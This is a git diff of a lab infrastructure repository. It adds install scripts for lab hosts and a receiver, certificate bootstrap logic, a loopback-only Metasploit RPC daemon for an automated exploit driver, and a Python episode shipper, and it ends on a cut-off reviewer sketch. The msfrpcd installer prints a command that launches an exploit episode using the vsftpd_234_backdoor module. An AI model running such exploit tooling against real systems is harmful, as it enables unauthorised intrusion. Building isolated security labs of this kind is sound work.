+# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
+# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
+# already on disk. Trust boundary: "reached bootstrap.wg over WG"
+# (iptmonads already filters non-peers from 443). Caddy's TLS cert
+# is verified against the bundled etc/caddy-root.crt — no chicken-
+# and-egg.
+HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
+    | head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
+if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
+    log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
+elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
+    log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
+    install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
+    TAR="/tmp/cis490-bootstrap-$$.tar"
+    if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
+            --connect-timeout 10 --max-time 60 \
+            "https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
+        tar -C "$ETC_ROOT/certs" -xf "$TAR"
+        mv "$ETC_ROOT/certs/ca.crt"          "$ETC_ROOT/certs/wg-ca.pem"
+        mv "$ETC_ROOT/certs/$HOST_ID.pem"    "$ETC_ROOT/certs/lab-host.pem"
+        mv "$ETC_ROOT/certs/$HOST_ID.key"    "$ETC_ROOT/certs/lab-host.key"
+        chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
+            "$ETC_ROOT/certs/lab-host.key"
+        chmod 0644 "$ETC_ROOT/certs/"*.pem
+        chmod 0640 "$ETC_ROOT/certs/lab-host.key"
+        rm -f "$TAR"
+        log "leaf cert installed for host_id=$HOST_ID"
+    else
+        rm -f "$TAR"
+        log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
+        log "      to 10.100.0.1 and that wg0 is up. cert delivery skipped."
+    fi
+else
+    log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
+fi
+
+# --- 8. baseline VM image + cidata (best-effort) -----------------------
+ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
+CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
+if [[ ! -f "$ALPINE_IMG" ]]; then
+    if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
+        log "fetched Alpine baseline -> $ALPINE_IMG"
+    else
+        log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
+    fi
+fi
+if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
+    log "building cidata.iso (in-guest agent embedded)"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
+        "$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
+        log "WARN: cidata build failed; run tools/build_cidata.py manually"
+fi
+# Symlink the canonical paths the launchers look at, when missing.
+ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
+ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true
+
+if [[ "$NEW_INSTALL" == "1" ]]; then
+    log ""
+    log "================================================================="
+    log "  FIRST-INSTALL NEXT STEPS                                        "
+    log "================================================================="
+    log "  1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
+    log ""
+    log "  2. (On the Pi.) Mint + ship a leaf cert for this host:"
+    log "       sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
+    log ""
+    log "  3. Run the diagnostic — every red row prints the exact fix:"
+    log "       $INSTALL_ROOT/.venv/bin/python \\"
+    log "           $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
+    log ""
+    log "  4. Smoke-test the pipe (returns ok=true on success):"
+    log "       sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
+    log "            --config $ETC_ROOT/lab-host.toml --ping"
+    log ""
+    log "  5. Turn on the services — episodes start flowing immediately:"
+    log "       sudo systemctl enable --now cis490-shipper cis490-orchestrator"
+    log "================================================================="
+fi
+
+log "lab-host install complete."
+log ""
+log "Cloning this repo and running the launchers manually is NOT enough."
+log "The lab-host role's data flow lives in the systemd services this"
+log "script just installed. If $INSTALL_ROOT/index.jsonl on the Pi stays"
+log "empty after step 5, run:"
+log "   $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"
--- a/scripts/install-msfrpcd.sh
+++ b/scripts/install-msfrpcd.sh
@ -0,0 +1,124 @@
+#!/usr/bin/env bash
+# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
+#
+# Idempotent: re-running on a host that already has msfrpcd refreshes
+# the systemd unit and credentials but doesn't reinstall the framework.
+#
+# Steps:
+#   1. Install metasploit-framework via the host package manager (or
+#      report the right one-liner for that distro). Big download —
+#      ~1 GiB and several minutes.
+#   2. Generate a strong password and store at /etc/cis490/msfrpc.env
+#      (mode 0640, owner root:cis490).
+#   3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
+#      msfrpcd bound to 127.0.0.1:55553 with the generated password.
+#   4. Enable + start.
+#
+# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
+# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.
+
+set -euo pipefail
+
+ETC_ROOT="/etc/cis490"
+ENV_FILE="$ETC_ROOT/msfrpc.env"
+UNIT="/etc/systemd/system/cis490-msfrpcd.service"
+PORT="${MSFRPC_PORT:-55553}"
+USER_NAME="${MSFRPC_USER:-msf}"
+
+log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+[[ $EUID -eq 0 ]] || die "must run as root"
+command -v systemctl >/dev/null || die "systemd not found"
+
+# --- 1. install metasploit-framework -----------------------------------
+if ! command -v msfrpcd >/dev/null; then
+    log "msfrpcd not found; installing metasploit-framework"
+    if command -v apt-get >/dev/null; then
+        # The Debian/Ubuntu metasploit-framework package isn't in
+        # the default repos for most distros, and we don't automate
+        # Rapid7's nightly installer here. Point the operator at it.
+        if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
+            log "automated install not available — install manually:"
+            log "  https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
+            die "rerun once msfrpcd is on PATH"
+        fi
+        # Symlink the wrapper so ``msfrpcd`` is on PATH.
+        ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
+    elif command -v pacman >/dev/null; then
+        log "pacman -S metasploit"
+        pacman -Sy --noconfirm metasploit
+    elif command -v dnf >/dev/null; then
+        die "Fedora/RHEL: install metasploit-framework manually, then re-run"
+    else
+        die "unknown package manager — install metasploit-framework manually"
+    fi
+fi
+
+command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"
+
+# --- 2. generate password ----------------------------------------------
+install -d -m 0755 -o root -g root "$ETC_ROOT"
+if ! id -u cis490 >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin cis490
+fi
+if [[ ! -f "$ENV_FILE" ]]; then
+    log "generating msfrpc password"
+    PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
+    install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
+# Auto-generated by install-msfrpcd.sh — do not edit.
+MSFRPC_HOST=127.0.0.1
+MSFRPC_PORT=$PORT
+MSFRPC_USER=$USER_NAME
+MSFRPC_PASSWORD=$PW
+EOF
+else
+    log "$ENV_FILE exists; preserving existing password"
+fi
+
+# --- 3. systemd unit ----------------------------------------------------
+log "installing systemd unit"
+cat > "$UNIT" <<EOF
+[Unit]
+Description=CIS490 — Metasploit RPC daemon (loopback only)
+Documentation=https://maxgit.wg/spectral/CIS490
+After=network-online.target
+Wants=network-online.target
+
+[Service]
+Type=simple
+EnvironmentFile=$ENV_FILE
+# msfrpcd flags:
+#   -P <pw>   password
+#   -U <user> username
+#   -a <ip>   bind address (loopback only — Tier-3 driver runs locally)
+#   -p <port> port
+#   -f        foreground (no daemonization, so systemd manages PID)
+ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
+Restart=on-failure
+RestartSec=5
+NoNewPrivileges=true
+PrivateTmp=true
+ProtectSystem=full
+ProtectHome=true
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+systemctl daemon-reload
+systemctl enable --now cis490-msfrpcd
+
+# --- 4. final smoke -----------------------------------------------------
+sleep 2
+if ! ss -ltn 2>/dev/null | grep -qE "127\.0\.0\.1:$PORT[[:space:]]"; then
+    log "WARN: nothing listening on 127.0.0.1:$PORT yet — check"
+    log "       journalctl -u cis490-msfrpcd"
+fi
+
+log "done. To run a Tier-3 episode:"
+log "  set -a; . $ENV_FILE; set +a"
+log "  python tools/run_tier3_demo.py --module vsftpd_234_backdoor"
--- a/scripts/install-receiver.sh
+++ b/scripts/install-receiver.sh
@ -0,0 +1,112 @@
+#!/usr/bin/env bash
+# Install / refresh the CIS490 receiver role on the central WG node
+# (the Pi5 in our setup). Idempotent — safe to re-run.
+#
+# Steps:
+#   1. Verify prereqs (python3.11+, systemd).
+#   2. Create the cis490 service user + /var/lib/cis490 layout.
+#   3. Sync the repo into /opt/cis490 and build a venv.
+#   4. Install cis490-receiver.service and cis490-bootstrap.service.
+#   5. Drop /etc/cis490/receiver.toml on first install.
+#
+# This script does NOT:
+#   - configure Caddy. Add a `collector.wg` block to your spectral/caddy
+#     config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
+#   - issue server / client certs. wg-pki owns CA + leaf issuance.
+#   - open firewall ports. iptmonads owns the WG-side ruleset.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
+DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
+ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
+SERVICE_USER="${SERVICE_USER:-cis490}"
+
+log() { printf '[install-receiver] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+# --- 1. prereqs --------------------------------------------------------
+log "checking prereqs"
+if [[ $EUID -ne 0 ]]; then
+    die "must run as root"
+fi
+command -v systemctl >/dev/null || die "systemd not found"
+command -v python3 >/dev/null || die "python3 not on PATH"
+
+PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
+if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
+    die "python >=3.11 required, found $PY_VER"
+fi
+
+USE_UV=0
+if command -v uv >/dev/null; then USE_UV=1; fi
+
+# --- 2. user + layout --------------------------------------------------
+log "ensuring service user $SERVICE_USER"
+if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin \
+        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
+fi
+
+install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
+    "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
+# Pre-create the index file so the first PUT doesn't race on creation.
+sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"
+
+# --- 3. repo + venv ----------------------------------------------------
+log "syncing repo into $INSTALL_ROOT"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
+cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
+chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
+
+log "building venv"
+if [[ "$USE_UV" -eq 1 ]]; then
+    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
+        uv sync --project "$INSTALL_ROOT"
+else
+    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet --upgrade pip
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet starlette 'uvicorn[standard]'
+fi
+
+# --- 4. systemd --------------------------------------------------------
+log "installing systemd units (receiver + bootstrap)"
+install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
+    /etc/systemd/system/cis490-receiver.service
+install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
+    /etc/systemd/system/cis490-bootstrap.service
+systemctl daemon-reload
+
+# --- 5. config template (only on first install) -----------------------
+if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
+    log "writing $ETC_ROOT/receiver.toml (template)"
+    install -m 0640 -o root -g "$SERVICE_USER" \
+        "$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
+    log ""
+    log "FIRST-INSTALL NEXT STEPS:"
+    log "  1. Verify $ETC_ROOT/receiver.toml paths."
+    log "  2. Add a collector.wg block to your spectral/caddy config."
+    log "     Example:"
+    log "       collector.wg {"
+    log "           tls internal"
+    log "           reverse_proxy 127.0.0.1:8443"
+    log "       }"
+    log "     (mTLS to clients is enforced by the wg-pki CA bundle on"
+    log "      the receiver side once leaf certs are issued.)"
+    log "  3. Open the WG-side port via iptmonads."
+    log "  4. systemctl enable --now cis490-receiver cis490-bootstrap"
+    log "  5. From a lab host: cis490-shipper --ping"
+    log ""
+    log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
+    log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
+    log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
+else
+    log "$ETC_ROOT/receiver.toml exists; leaving in place"
+fi
+
+log "receiver install complete."
--- a/scripts/issue-cis490-client-cert-wrapper.sh
+++ b/scripts/issue-cis490-client-cert-wrapper.sh
@ -0,0 +1,50 @@
+#!/usr/bin/env bash
+# Wrapper that re-points the wg-pki issuer script's relative-path
+# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
+# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
+#
+# wg-pki ships the actual issuer at
+# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
+# computes paths relative to its own location. This wrapper sets
+# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
+# --out-dir to a path under /var/lib so cis490-bootstrap (with
+# ProtectHome=tmpfs) can write the resulting tarballs.
+
+set -euo pipefail
+
+# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
+# fall back to whatever wg-pki clone the operator has under /home.
+ISSUER="${WG_PKI_ISSUER:-}"
+if [[ -z "$ISSUER" ]]; then
+    for cand in \
+        /opt/wg-pki/scripts/issue-cis490-client-cert.sh \
+        /home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
+        /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
+        if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
+    done
+fi
+if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
+    echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
+    exit 2
+fi
+OUT_ROOT="/var/lib/wg-pki/issued"
+
+if [[ $# -lt 1 ]]; then
+    echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
+    exit 2
+fi
+
+HOST_ID="$1"; shift
+
+# Pull off any --out-dir already passed; we override.
+EXTRA=()
+while [[ $# -gt 0 ]]; do
+    case "$1" in
+        --out-dir) shift 2 ;;          # drop, we set it ourselves
+        *) EXTRA+=("$1"); shift ;;
+    esac
+done
+
+mkdir -p "$OUT_ROOT/$HOST_ID"
+# ${EXTRA[@]+...} keeps `set -u` from tripping on an empty array (bash < 4.4).
+exec env WG_PKI_STATE=/var/lib/wg-pki \
+    "$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" ${EXTRA[@]+"${EXTRA[@]}"}
--- a/shipper/__init__.py
+++ b/shipper/__init__.py
--- a/shipper/__main__.py
+++ b/shipper/__main__.py
@ -0,0 +1,106 @@
+"""``cis490-shipper`` CLI entrypoint.
+
+Modes:
+
+  --ping       hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
+               No tarball flow; index.jsonl on the receiver is untouched.
+  --once       one scan pass over data/episodes/, ship anything done, exit.
+  (default)    long-running daemon; rescans every scan_interval_s.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import logging
+import signal
+import sys
+from pathlib import Path
+
+from .config import ShipperConfig
+from .queue import ShipperQueue
+from .transport import ShipperTransport
+
+
+def _setup_logging(level: str) -> None:
+    logging.basicConfig(
+        level=getattr(logging, level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(prog="cis490-shipper")
+    parser.add_argument(
+        "--config",
+        default="/etc/cis490/lab-host.toml",
+        help="Path to lab-host config (TOML)",
+    )
+    parser.add_argument(
+        "--ping",
+        action="store_true",
+        help="Hit /v1/ping on the receiver and exit",
+    )
+    parser.add_argument(
+        "--once",
+        action="store_true",
+        help="One scan pass, then exit (default is long-running daemon)",
+    )
+    parser.add_argument("--log-level", default="INFO")
+    args = parser.parse_args(argv)
+
+    _setup_logging(args.log_level)
+    log = logging.getLogger("cis490.shipper")
+
+    try:
+        cfg = ShipperConfig.load(args.config)
+    except (FileNotFoundError, ValueError) as e:
+        log.error("config error: %s", e)
+        return 2
+
+    transport = ShipperTransport(cfg)
+
+    if args.ping:
+        result = transport.ping()
+        # Print structured one-liner for CI / test pipelines.
+        print(json.dumps({
+            "ok": result.ok,
+            "status_code": result.status_code,
+            "host_id": cfg.host_id,
+            "receiver": cfg.receiver.url,
+            "body": result.body,
+            "error": result.error,
+        }))
+        return 0 if result.ok else 1
+
+    queue = ShipperQueue(cfg, transport)
+    if args.once:
+        result = queue.run_once()
+        log.info(
+            "scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
+            result.scanned, result.shipped, result.transient_failures,
+            result.conflicts, result.fatal,
+        )
+        # Exit code reflects fatal-only; transient failures aren't an error
+        # because the next pass / service restart will retry.
+        return 1 if result.fatal else 0
+
+    # Daemon mode
+    stopping = False
+    def _stop(signum, frame):  # noqa: ARG001
+        nonlocal stopping
+        log.info("received signal %s; finishing pass and exiting", signum)
+        stopping = True
+    signal.signal(signal.SIGTERM, _stop)
+    signal.signal(signal.SIGINT, _stop)
+
+    log.info(
+        "shipper starting: host_id=%s data_root=%s receiver=%s",
+        cfg.host_id, cfg.data_root, cfg.receiver.url,
+    )
+    queue.run_forever(stop_check=lambda: stopping)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
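
Reviewer note: `--ping` prints a single JSON object, so a CI step can gate on it without scraping logs. The following is a minimal sketch, assuming only the field names that `main()` prints above. The helper `parse_ping_line` and the sample values are hypothetical and not part of the repo.

```python
import json


def parse_ping_line(line: str) -> tuple[bool, str]:
    """Parse the one-line JSON printed by `cis490-shipper --ping`.

    Returns (ok, summary). Field names mirror the dict built in main();
    this helper itself is hypothetical and not part of the repo.
    """
    doc = json.loads(line)
    ok = bool(doc.get("ok"))
    if ok:
        summary = f"{doc.get('host_id')} -> {doc.get('receiver')}: ok"
    else:
        summary = (
            f"{doc.get('host_id')} -> {doc.get('receiver')}: "
            f"status={doc.get('status_code')} error={doc.get('error')}"
        )
    return ok, summary


# Sample values are made up for illustration.
sample = json.dumps({
    "ok": False,
    "status_code": 0,
    "host_id": "lab-7",
    "receiver": "https://collector.wg",
    "body": None,
    "error": "connection refused",
})
print(parse_ping_line(sample))
```

A `status_code` of 0 in the output corresponds to the transport-level failure branch in `ShipperTransport.ping()`, where no HTTP response was received.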
--- a/shipper/config.py
+++ b/shipper/config.py
@ -0,0 +1,91 @@
+"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""
+
+from __future__ import annotations
+
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+@dataclass(frozen=True)
+class ReceiverEndpoint:
+    url: str                       # e.g. "https://collector.wg"
+    ca_bundle: Path | None = None
+    client_cert: Path | None = None
+    client_key: Path | None = None
+    bearer_token: str | None = None
+    verify_tls: bool = True
+
+
+@dataclass(frozen=True)
+class ShipperConfig:
+    host_id: str
+    data_root: Path                # Lab-host data root; episodes/, outbox/, shipped/ live here.
+    receiver: ReceiverEndpoint
+    # Daemon mode: how often to scan for new done.marker files.
+    scan_interval_s: float = 5.0
+    # PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
+    # at WG speeds this is well under 60s for a typical episode.
+    request_timeout_s: float = 60.0
+    # Backoff schedule on transient (5xx / network) failures, in seconds,
+    # capped at the last entry. The shipper's scan loop will pick the
+    # episode up again on the next pass regardless.
+    backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
+    # Local retention before pruning data/shipped/.
+    keep_local_for_days: int = 7
+
+    @property
+    def episodes_dir(self) -> Path:
+        return self.data_root / "episodes"
+
+    @property
+    def outbox_dir(self) -> Path:
+        return self.data_root / "outbox"
+
+    @property
+    def shipped_dir(self) -> Path:
+        return self.data_root / "shipped"
+
+    @classmethod
+    def load(cls, path: str | Path) -> "ShipperConfig":
+        with open(path, "rb") as f:
+            data = tomllib.load(f)
+
+        host_id = data.get("host_id")
+        if not isinstance(host_id, str) or not host_id:
+            raise ValueError("lab-host config: host_id (string) required at top level")
+
+        paths = data.get("paths", {})
+        data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()
+
+        rcv = data.get("receiver", {})
+        url = rcv.get("url")
+        if not isinstance(url, str) or not url:
+            raise ValueError("lab-host config: receiver.url required")
+
+        receiver = ReceiverEndpoint(
+            url=url.rstrip("/"),
+            ca_bundle=_optional_path(rcv.get("ca_bundle")),
+            client_cert=_optional_path(rcv.get("client_cert")),
+            client_key=_optional_path(rcv.get("client_key")),
+            bearer_token=rcv.get("bearer_token"),
+            verify_tls=bool(rcv.get("verify_tls", True)),
+        )
+
+        retention = data.get("retention", {})
+        return cls(
+            host_id=host_id,
+            data_root=data_root,
+            receiver=receiver,
+            scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
+            request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
+            keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
+        )
+
+
+def _optional_path(v: object) -> Path | None:
+    if v in (None, ""):
+        return None
+    if isinstance(v, str):
+        return Path(v).expanduser()
+    # ValueError (not TypeError) so main()'s config-error handler catches it.
+    raise ValueError(f"expected path string, got {type(v).__name__}")
--- a/shipper/queue.py
+++ b/shipper/queue.py
@ -0,0 +1,195 @@
+"""Shipper episode queue — scan, compress, ship, retire.
+
+State machine, mirroring docs/transport.md:
+
+    data/episodes/<id>/done.marker
+        |
+        v
+    tar+zstd → data/outbox/<id>.tar.zst.partial
+        |
+        v
+    rename → data/outbox/<id>.tar.zst
+        |
+        v
+    PUT to receiver
+        |
+        +-- 200/201 → mv data/episodes/<id> → data/shipped/<id>
+        |             rm data/outbox/<id>.tar.zst
+        |
+        +-- 409     → leave files in place (the local + remote tarball
+        |             differ; manual triage)
+        |
+        +-- 5xx/net → leave outbox tarball; retry on next pass
+        |
+        +-- 4xx     → log + skip (caller-side bug, doesn't self-heal)
+
+Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
+which the next pass overwrites. A crash mid-PUT leaves the tarball in
+``outbox/``; the next pass rebuilds it from the episode dir and
+re-ships it. The receiver responds 200 on a matching sha256, 409 on a
+divergent one.
+"""
+
+from __future__ import annotations
+
+import logging
+import shutil
+import subprocess
+import tarfile
+import tempfile
+import time
+from dataclasses import dataclass
+from pathlib import Path
+
+from .config import ShipperConfig
+from .transport import ShipperTransport, ShipResult, hash_file
+
+
+log = logging.getLogger("cis490.shipper.queue")
+
+
+@dataclass(frozen=True)
+class PassResult:
+    scanned: int
+    shipped: int
+    transient_failures: int
+    conflicts: int
+    fatal: int
+
+
+class ShipperQueue:
+    def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
+        self.cfg = cfg
+        self.transport = transport
+        cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
+        cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
+        cfg.shipped_dir.mkdir(parents=True, exist_ok=True)
+
+    # ---- main entry point ---------------------------------------------
+
+    def run_once(self) -> PassResult:
+        """One scan pass. Returns counts for logging / tests."""
+        ready = self._ready_episodes()
+        scanned = len(ready)
+        shipped = 0
+        transient = 0
+        conflicts = 0
+        fatal = 0
+
+        for ep_dir in ready:
+            episode_id = ep_dir.name
+            try:
+                tarball, sha = self._tar_episode(ep_dir)
+            except Exception:
+                log.exception("tar failed for %s", episode_id)
+                transient += 1
+                continue
+
+            res = self.transport.ship_tarball(episode_id, tarball, sha)
+            log.info(
+                "ship %s -> %s (%d) %s",
+                episode_id, res.status, res.status_code, res.error or "",
+            )
+
+            if res.status in ("stored", "already-present"):
+                self._retire(ep_dir, tarball)
+                shipped += 1
+            elif res.status == "conflict":
+                conflicts += 1
+                # Keep the tarball + episode dir in place. Operator must
+                # decide whether to drop our copy or fix the remote one.
+            elif res.status == "transient":
+                transient += 1
+            else:  # fatal
+                fatal += 1
+
+        return PassResult(
+            scanned=scanned,
+            shipped=shipped,
+            transient_failures=transient,
+            conflicts=conflicts,
+            fatal=fatal,
+        )
+
+    def run_forever(self, *, stop_check=lambda: False) -> None:
+        while not stop_check():
+            try:
+                self.run_once()
+            except Exception:
+                log.exception("scan pass crashed; sleeping anyway")
+            # Coarse sleep: we don't need precise scheduling and we
+            # don't want a tight loop on errors.
+            t0 = time.monotonic()
+            while time.monotonic() - t0 < self.cfg.scan_interval_s:
+                if stop_check():
+                    return
+                time.sleep(0.5)
+
+    # ---- internals -----------------------------------------------------
+
+    def _ready_episodes(self) -> list[Path]:
+        out: list[Path] = []
+        if not self.cfg.episodes_dir.exists():
+            return out
+        for ep in sorted(self.cfg.episodes_dir.iterdir()):
+            if ep.is_dir() and (ep / "done.marker").exists():
+                out.append(ep)
+        return out
+
+    def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
+        """Tar+zstd the episode dir into outbox. Idempotent — overwrites
+        any prior partial. Returns ``(tarball_path, sha256_hex)``."""
+        episode_id = ep_dir.name
+        outbox = self.cfg.outbox_dir
+        partial = outbox / f"{episode_id}.tar.zst.partial"
+        final = outbox / f"{episode_id}.tar.zst"
+
+        partial.unlink(missing_ok=True)
+
+        # We use the system `zstd` for streaming compression: pipe a
+        # tar stream into `zstd -T0 -19` to get a deterministic tarball
+        # without buffering the whole tar in memory or pulling in the
+        # python-zstandard dependency. There is no in-process fallback:
+        # if the binary isn't on PATH we raise rather than ship a
+        # non-zstd tarball.
+        if _which_zstd():
+            with partial.open("wb") as zout:
+                proc = subprocess.Popen(
+                    ["zstd", "-q", "-T0", "-19", "--stdout"],
+                    stdin=subprocess.PIPE, stdout=zout,
+                )
+                assert proc.stdin is not None
+                with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
+                    tf.add(ep_dir, arcname=episode_id, recursive=True)
+                proc.stdin.close()
+                rc = proc.wait()
+                if rc != 0:
+                    partial.unlink(missing_ok=True)
+                    raise RuntimeError(f"zstd exited {rc}")
+        else:
+            # No fallback: the stdlib's gzip/zlib output is not
+            # zstd-compatible. Surface the missing binary rather than
+            # silently producing a non-zstd tarball.
+            partial.unlink(missing_ok=True)
+            raise RuntimeError(
+                "the `zstd` binary is required on the lab host. "
+                "Install it via your package manager."
+            )
+
+        sha = hash_file(partial)
+        partial.replace(final)
+        return final, sha
+
+    def _retire(self, ep_dir: Path, tarball: Path) -> None:
+        """Move episode dir → shipped/, drop the tarball."""
+        target = self.cfg.shipped_dir / ep_dir.name
+        if target.exists():
+            # Belt-and-suspenders: re-shipping an already-retired
+            # episode shouldn't happen (the dir was moved), but if it
+            # does, prefer the existing copy and just clean up.
+            shutil.rmtree(ep_dir, ignore_errors=True)
+        else:
+            ep_dir.replace(target)
+        tarball.unlink(missing_ok=True)
+
+
+def _which_zstd() -> bool:
+    return shutil.which("zstd") is not None
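
Reviewer note: the `.partial` then rename step in `_tar_episode()` is what makes a crashed pass safe to repeat. The sketch below isolates that pattern with plain bytes instead of a tar+zstd stream. The helper name `publish_atomically` is hypothetical, and the atomicity claim assumes a POSIX filesystem with both paths on the same mount.

```python
import hashlib
import tempfile
from pathlib import Path


def publish_atomically(outbox: Path, name: str, payload: bytes) -> tuple[Path, str]:
    """Write to <name>.partial, hash it, then rename to <name>.

    Readers of `outbox` never see a half-written final file, because
    Path.replace() is a single rename when source and target share a
    filesystem (POSIX semantics assumed).
    """
    partial = outbox / f"{name}.partial"
    final = outbox / name
    partial.unlink(missing_ok=True)      # discard leftovers from a crashed pass
    partial.write_bytes(payload)
    sha = hashlib.sha256(partial.read_bytes()).hexdigest()
    partial.replace(final)
    return final, sha


with tempfile.TemporaryDirectory() as tmp:
    outbox = Path(tmp)
    # Simulate a crash that left a stale partial behind.
    (outbox / "01TEST.tar.zst.partial").write_bytes(b"truncated")
    final, sha = publish_atomically(outbox, "01TEST.tar.zst", b"episode bytes")
    leftovers = sorted(p.name for p in outbox.iterdir())
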